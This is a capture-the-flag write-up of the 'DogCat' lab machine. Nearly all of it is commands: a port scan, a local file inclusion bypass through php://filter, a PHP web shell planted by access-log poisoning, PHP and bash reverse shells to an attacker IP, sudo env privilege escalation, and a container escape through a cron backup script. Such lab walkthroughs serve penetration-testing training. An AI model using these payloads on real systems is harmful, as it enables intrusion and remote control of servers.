# DogCat

```bash
nmap -A -T4 -p- -oN nmap.txt 10.10.167.40
```

https://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601

To get the php code for the website

```text
http://10.10.164.40/?view=php://filter/dog/convert.base64-encode/resource=index
```

From the source code we know that the view parameter needs to have "dog" or "cat" in it and if we don't set the ext parameter then it will be set to ".php"

```text
http://10.10.164.40/?view=php://filter/dog/resource=/etc/passwd&ext=
```

https://resources.infosecinstitute.com/topic/local-file-inclusion-code-execution/

When we request the server to access a file, it will execute it

By sending the server a malicious request the server will execute it when we tell it to open the /var/log/apache2/access.log file (/proc/self/environ for older machines)

```text
nc -lnvp 4444

php -r '$sock=fsockopen("10.6.1.136",4444);exec("/bin/sh -i <&3 >&3 2>&3");' # Decoded PHP Reverse Shell

http://10.10.164.40/?view=php://filter/dog/resource=/var/log/apache2/access.log&ext=&cmd=php+%24sock%3Dfsockopen(%2210.6.1.136%22%2C4444)%3Bexec(%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22)%3B

<?php system($_GET['cmd']) ?> # Put in user agent in Burp Suite
```

We can put the reverse shell code in the user agent because it is outputted when we request /var/log/apache2/access.log

```bash
sudo -l
```
We can run /usr/bin/env as root without a password

```
/usr/bin/env /bin/sh -p
```

after running linpeas we find out that this is a docker container and there is a file called /opt/backups/backup.tar that was modified in the last 5 minutes so it could be a cronjob executed by the host machine

```
nc -lnvp 7777

echo "#!/bin/bash" > /opt/backups/backup.sh
echo "bash -i >& /dev/tcp/10.6.1.136/7777 0>&1" >> /opt/backups/backup.sh
```
